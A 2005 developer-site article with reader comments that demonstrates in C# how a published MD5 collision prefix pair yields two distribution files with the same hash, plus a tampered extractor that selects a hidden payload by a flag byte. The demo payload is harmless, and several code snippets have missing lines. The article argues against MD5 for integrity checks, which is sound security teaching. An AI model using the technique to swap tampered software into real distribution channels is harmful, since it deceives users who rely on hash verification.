11,648,094 members (71,550 online)

# Exploiting MD5 collisions (in C#)

, 20 Sep 2005 269.8K 3.2K 80
 Rate this:
This article shows how the MD5 collisions can be used to tamper software distribution schemas.

## Introduction

In my previous article Good Bye MD5, I introduced you to the current findings on cryptology and MD5 collision detection. A debate started, and most of the people think that these findings are not a serious issue.

Microsoft agreed that this is an important issue:

"Microsoft is banning certain cryptographic functions from new computer code, citing increasingly sophisticated attacks that make them less secure, according to a company executive".

"The Redmond, Wash., software company instituted a new policy for all developers that bans functions using the DES, MD4, MD5 and, in some cases, the SHA1 encryption algorithm, which is becoming "creaky at the edges," said Michael Howard, senior security program manager at the company, Howard said". Source: Microsoft Scraps Old Encryption in New Code

We now have some proofs of concept, like a pair of X.509 colliding certificates and a spectacular example of a pair of postscript documents, with the same MD5 hash value, you can read about this in the excellent paper, Attacking Hash Functions by Poisoned Messages "The Story of Alice and her Boss".

## How to exploit the collisions

There is a known result about MD5 hash function:

`If MD5(x) == MD5(y) then MD5(x+q) == MD5(y+q)`

So, if you have a pair of messages, `x` and `y`, with the same MD5 value, you can append a payload `q`, the MD5 value remains the same, the size of q is arbitrary. You need a pair of vectors, `x` and `y` to do the exploit. You can try to find a pair for yourself, but we already have a pair of values, given by the Chinese investigators Joux and Wang. A practical use of this pair of vector values is explained in the paper MD5 To Be Considered Harmful Someday, by Dan Kaminsky.

In my blog, I have written about these issues, and now I want to show you how you can make an exploit using these vectors.

## Hacking software distribution

The proof of concept to be shown in this article has the following scenario:

• This is a simulated software distribution mechanism.
• The software is distributed in binary format, in files with .bin extension.
• Exists as an extraction program that checks and extracts the software from the .bin file.
• For verification purpose, we use the MD5 value to check the integrity of the .bin files.

This picture shows a scenario, where a pair of binary files with the same MD5 are generated, MD5(good.bin) == MD5(evil.bin):

## Attacking the distribution software

First, we will build a generator program, this program takes a pair of executables, the first is a harmless program and the second the evil file, is a harmful program, and generates a pair of binary distribution files (.bin files). These are good.bin distribution file, and an evil.bin distribution file.

### The good program

The code of the harmless program is simple:

```namespace GoodExe
{
/// <summary>
/// A Harmless program
/// </summary>
class Class1
{
/// <summary>
/// The main entry point for the application.
/// </summary>
static void Main(string[] args)
{
Console.WriteLine ("this is a good executable");
}
}
}```

### The evil program

This is the code of the evil program, that simulates a harmful behavior:

```using System;

namespace EvilExe
{
/// <summary>
/// A harmfull program
/// </summary>
class Class1
{
/// <summary>
/// The main entry point for the application.
/// </summary>
static void Main(string[] args)
{
Console.WriteLine ("This is an evil file");
Console.WriteLine ("Just joking...");
}
}
}```

## The collision generator

We have a pair of vectors with the same MD5 value:

```/// <summary>
/// First prefix vector
/// Taken from stripwire by Dan Kaminsky
/// <A href="http://www.doxpara.com/md5_someday.pdf">http://www.doxpara.com/md5_someday.pdf</A>
/// </summary>
static byte[] vec1 =
{
0xd1, 0x31, 0xdd, 0x02, 0xc5, 0xe6
, 0xee , 0xc4 , 0x69 , 0x3d, 0x9a , 0x06
, 0x98 , 0xaf , 0xf9 , 0x5c , 0x2f , 0xca
, 0xb5 , /**/0x87 , 0x12 , 0x46 , 0x7e
, 0xab , 0x40 , 0x04 , 0x58 , 0x3e , 0xb8
, 0xfb , 0x7f , 0x89 , 0x55 , 0xad
, 0x34 , 0x06 , 0x09 , 0xf4 , 0xb3 , 0x02
, 0x83 , 0xe4 , 0x88 , 0x83 , 0x25
, 0x71 , 0x41 , 0x5a, 0x08 , 0x51 , 0x25
, 0xe8 , 0xf7 , 0xcd , 0xc9 , 0x9f ,
0xd9 , 0x1d , 0xbd , 0xf2 , 0x80 , 0x37
, 0x3c , 0x5b , 0xd8 , 0x82 , 0x3e
, 0x31 , 0x56 , 0x34 , 0x8f , 0x5b , 0xae
, 0x6d , 0xac , 0xd4 , 0x36 , 0xc9
, 0x19 , 0xc6 , 0xdd , 0x53 , 0xe2 , 0xb4
, 0x87 , 0xda , 0x03 , 0xfd , 0x02
, 0x39 , 0x63 , 0x06 , 0xd2 , 0x48 , 0xcd
, 0xa0 , 0xe9 , 0x9f , 0x33 , 0x42
, 0x0f , 0x57 , 0x7e , 0xe8 , 0xce , 0x54
, 0xb6 , 0x70 , 0x80 , 0xa8 , 0x0d
, 0x1e , 0xc6 , 0x98 , 0x21 , 0xbc , 0xb6
, 0xa8 , 0x83 , 0x93 , 0x96 , 0xf9
, 0x65 , 0x2b , 0x6f , 0xf7 , 0x2a , 0x70
};```
```/// <summary>
/// Second prefix vector
/// Taken from stripwire by Dan Kaminsky
/// <A href="http://www.doxpara.com/md5_someday.pdf">http://www.doxpara.com/md5_someday.pdf</A>
/// </summary>
static byte[] vec2 =
{
0xd1 , 0x31, 0xdd , 0x02 , 0xc5 , 0xe6
, 0xee , 0xc4 , 0x69 , 0x3d , 0x9a , 0x06
, 0x98 , 0xaf , 0xf9 , 0x5c, 0x2f , 0xca
, 0xb5 , /**/0x07 , 0x12 , 0x46 , 0x7e
, 0xab , 0x40 , 0x04 , 0x58 , 0x3e , 0xb8
, 0xfb , 0x7f , 0x89 , 0x55 , 0xad
, 0x34 , 0x06 , 0x09 , 0xf4 , 0xb3 , 0x02
, 0x83 , 0xe4 , 0x88 , 0x83 , 0x25
,/**/ 0xf1 , 0x41 , 0x5a , 0x08 , 0x51 , 0x25
, 0xe8 , 0xf7 , 0xcd , 0xc9 , 0x9f
, 0xd9 , 0x1d , 0xbd , /**/0x72 , 0x80
, 0x37 , 0x3c , 0x5b, 0xd8 , 0x82
, 0x3e , 0x31 , 0x56 , 0x34 , 0x8f , 0x5b
, 0xae , 0x6d , 0xac , 0xd4 , 0x36
, 0xc9 , 0x19 , 0xc6 , 0xdd , 0x53 , 0xe2
, /**/0x34 , 0x87 , 0xda , 0x03 , 0xfd
, 0x02 , 0x39 , 0x63 , 0x06 , 0xd2 , 0x48
, 0xcd , 0xa0, 0xe9 , 0x9f , 0x33
, 0x42 , 0x0f , 0x57 , 0x7e , 0xe8 , 0xce
, 0x54 , 0xb6 , 0x70 , 0x80 , /**/ 0x28
, 0x0d , 0x1e, 0xc6 , 0x98 , 0x21 , 0xbc
, 0xb6 , 0xa8 , 0x83 , 0x93 , 0x96
, 0xf9 , 0x65 , /* flag byte*/0xab
, 0x6f , 0xf7 , 0x2a , 0x70
};```

Remember that given this pair of vectors, if we have a payload of any size, then MD5(vec1+payload) == MD5(vec2+payload). The payload is built in this way, the length of good file, the length of evil file, the content of the good file, and the content of the evil file.

The core of the generation program is shown below:

```[STAThread]
static void Main(string[] args)
{
if (args.Length != 2)
Usage();

WriteBinary("good.bin", vec1, goodFile, evilFile);
WriteBinary("evil.bin", vec2, goodFile, evilFile);

ShowMD5("good.bin");
ShowMD5("evil.bin");
}

private static void Usage ()
{
Console.WriteLine("Usage: md5gen good_file evil_file");
Environment.Exit (-1);
}

private static void WriteBinary (string sOutFileName,
byte[] prefix, byte[] goodFile, byte[] evilFile)
{
using (FileStream fs = File.OpenWrite (sOutFileName))
{
using (BinaryWriter writer = new BinaryWriter(fs))
{
writer.Write(prefix);
writer.Write ( goodFile.Length );
writer.Write ( evilFile.Length );
fs.Write (goodFile, 0, goodFile.Length);
fs.Write (evilFile, 0, evilFile.Length);
fs.Close ();
}
}
}```

If we apply the generator program to the pair of programs, we generate a pair of files, good.bin and evil.bin in the following way:

```C:\TEMP>md5clone goodexe.exe evilexe.exe
MD5 Hash for good.bin is 1D8EE13FBA00DD022F002AAD0E3EF9C7
MD5 Hash for evil.bin is 1D8EE13FBA00DD022F002AAD0E3EF9C7```

Now, we can publish good.bin in the Internet for people to download it, and later, we can replace it with evil.bin. Now, the users will get infected, without noticing and convinced that there is no tampering, because the MD5 signature is the same for both files, in others words we have MD5(good.bin) == MD5(evil.bin).

## The extractor program

Now, suppose we have changed the extractor program, with our own version. Our extractor receives the .bin distribution file, and extracts the good or evil program based on the prefix vector at the beginning of the .bin file. We use the byte at position 123 to detect the vector that is used for the prefix.

The code of the extractor is very simple:

```[STAThread]
static void Main(string[] args)
{
if (args.Length == 0)
Usage();
ExtractFile(args[0], args[1]);
}

private static void ExtractFile (string sfilename,
string soutputfile)
{
{
/// open evil file
if (vec[123] == 0xab)
{
using (BinaryWriter writer =
new BinaryWriter(File.OpenWrite (soutputfile)))
{
writer.Write (evil);
writer.Close ();
}
}
else
{
using (BinaryWriter writer =
new BinaryWriter(File.OpenWrite (soutputfile)))
{
writer.Write (good);
writer.Close ();
}
}
Console.WriteLine ("File written on {0}",
soutputfile);
}
}

private static void Usage ()
{
Console.WriteLine(
"Usage: md5extract file.bin output_file.exe");
Environment.Exit (-1);
}```

Suppose, you receive the good.bin file, then you apply the extractor on good.bin and the good.exe file is extracted. But if you receive the evil.bin file, then the extractor will extract the evil.exe, i.e. the harmful executable. Remember that MD5(evil.bin) == MD5(good.bin).

## Conclusion

Recently, the world of cryptographic hash functions was on crisis. A lot of researchers announced "attacks" to find collisions for common hash functions such as MD5 and SHA-1. "For cryptographers, these results are exciting - but many so-called "practitioners" turned them down as practically irrelevant".

I hope, this proof of concept will convince you that there is a serious issue with MD5.

"There have already been a few exploits of the collision-finding attacks against MD5: Kaminski [Ka] and Mikle [Mi] presented different executables with the same MD5 hash. One of Kaminski's executables was quite harmless, the other one very harmful. Mikle's executables were self-extracting archives, extracting different stuffs. Lenstra, Wang and de Weger [LWdW,LdW] constructed colliding X.509 certificates".

This article shows how a failure on the software distribution chain, allows exploiting the current findings on cryptology about the MD5 hash function.

## History

• September 20th, 2005: Some grammar correction, and title modified.

A list of licenses authors might use can be found here

## Share

 Web Developer Chile
Eduardo Diaz
personal blog

## You may also be interested in...

 First Prev Next
 Certificate collision MilanTomic7813-Oct-05 23:49 MilanTomic78 13-Oct-05 23:49
 Re: Certificate collision ediazc14-Oct-05 3:27 ediazc 14-Oct-05 3:27
 Caesar and Alice was better Anonymous23-Sep-05 14:32 Anonymous 23-Sep-05 14:32
 Re: Caesar and Alice was better ediazc24-Sep-05 5:24 ediazc 24-Sep-05 5:24
 Security is a process ediazc23-Sep-05 7:44 ediazc 23-Sep-05 7:44
 this is stupid ahurwitz23-Sep-05 5:21 ahurwitz 23-Sep-05 5:21
 Re: this is stupid Vanco23-Sep-05 6:20 Vanco 23-Sep-05 6:20
 Re: this is stupid ahurwitz23-Sep-05 7:32 ahurwitz 23-Sep-05 7:32
 Re: this is stupid Anonymous23-Sep-05 9:08 Anonymous 23-Sep-05 9:08
 Re: this is stupid ahurwitz23-Sep-05 7:34 ahurwitz 23-Sep-05 7:34
 Re: this is stupid Anonymous23-Sep-05 8:01 Anonymous 23-Sep-05 8:01
 Re: this is stupid xacatecas23-Sep-05 22:05 xacatecas 23-Sep-05 22:05
 Re: this is stupid evildictaitor7-Sep-06 7:38 evildictaitor 7-Sep-06 7:38
 Re: this is stupid anonymous23-Sep-05 22:06 anonymous 23-Sep-05 22:06
 Re: this is stupid Anonymous23-Sep-05 9:10 Anonymous 23-Sep-05 9:10
 Re: this is stupid orlyfu7-Nov-05 12:05 orlyfu 7-Nov-05 12:05
 Re: this is stupid evildictaitor7-Sep-06 7:33 evildictaitor 7-Sep-06 7:33
 Re: this is stupid Daniel Bolaños23-Mar-07 8:33 Daniel Bolaños 23-Mar-07 8:33
 What would be *really* useful ... CDGuru23-Sep-05 5:06 CDGuru 23-Sep-05 5:06
 Slashdotted Judah Himango23-Sep-05 4:18 Judah Himango 23-Sep-05 4:18
 Re: Slashdotted ediazc23-Sep-05 7:33 ediazc 23-Sep-05 7:33
 extractor Fred Spiessens23-Sep-05 3:01 Fred Spiessens 23-Sep-05 3:01
 Does this example demonstrate anything? anonymous23-Sep-05 2:58 anonymous 23-Sep-05 2:58
 Re: Does this example demonstrate anything? moobobcat9-Oct-05 22:50 moobobcat 9-Oct-05 22:50
 file size eean23-Sep-05 0:47 eean 23-Sep-05 0:47
 Re: file size Anonymous23-Sep-05 1:53 Anonymous 23-Sep-05 1:53
 Sorry, it's still not useful. chuck576120-Sep-05 10:26 chuck5761 20-Sep-05 10:26
 Re: Sorry, it's still not useful. ediazc20-Sep-05 10:42 ediazc 20-Sep-05 10:42
 Re: Sorry, it's still not useful. chuck576120-Sep-05 11:10 chuck5761 20-Sep-05 11:10
 Re: Sorry, it's still not useful. Erik Westermann20-Sep-05 11:50 Erik Westermann 20-Sep-05 11:50
 Re: Sorry, it's still not useful. Anonymous24-Sep-05 8:04 Anonymous 24-Sep-05 8:04
 Still a bit confussed brianma1-Dec-05 4:30 brianma 1-Dec-05 4:30
 Re: Still a bit confussed inphone1-Dec-05 4:38 inphone 1-Dec-05 4:38
 Re: Sorry, it's still not useful. GFeldman21-Sep-05 8:20 GFeldman 21-Sep-05 8:20
 chuck5761 wrote: If you've got the rights to write good.exe, why bother with all this? Just create bad.exe and rename it good.exe. You don't have to bother with MD5 hash collisions, because you can just post the MD5 hash for bad.exe. You're assuming that a person who has the ability to post bad.exe as good.exe also has the ability to post the MD5 hash. That's not the way distribution via mirror sites need to work, regardless of the signature algorithm. If somebody.net has authored a software package and wishes to distribute it via somemirror.net, then the proper way to check the signature is to compare the expected signature from somebody.net to the computed package signature from somemirror.net. I realize that many mirror sites also post the signatures, but as your example shows, that's a bad practice. Gary
 Re: Sorry, it's still not useful. chuck576121-Sep-05 9:25 chuck5761 21-Sep-05 9:25
 Re: Sorry, it's still not useful. GFeldman22-Sep-05 6:50 GFeldman 22-Sep-05 6:50
 Re: Sorry, it's still not useful. Anonymous25-Sep-05 21:54 Anonymous 25-Sep-05 21:54
 Re: Sorry, it's still not useful. Anonymous24-Sep-05 8:03 Anonymous 24-Sep-05 8:03
 Changing Extractor SirLestat15-Sep-05 10:29 SirLestat 15-Sep-05 10:29
 Re: Changing Extractor ediazc15-Sep-05 10:57 ediazc 15-Sep-05 10:57
 Very Insightful The_Mega_ZZTer15-Sep-05 1:38 The_Mega_ZZTer 15-Sep-05 1:38
 Re: Very Insightful computerguru9238215-Sep-05 4:40 computerguru92382 15-Sep-05 4:40
 Re: Very Insightful ediazc15-Sep-05 5:40 ediazc 15-Sep-05 5:40
 Re: Very Insightful computerguru9238215-Sep-05 19:20 computerguru92382 15-Sep-05 19:20
 Last Visit: 31-Dec-99 18:00     Last Update: 4-Aug-15 15:42 Refresh 1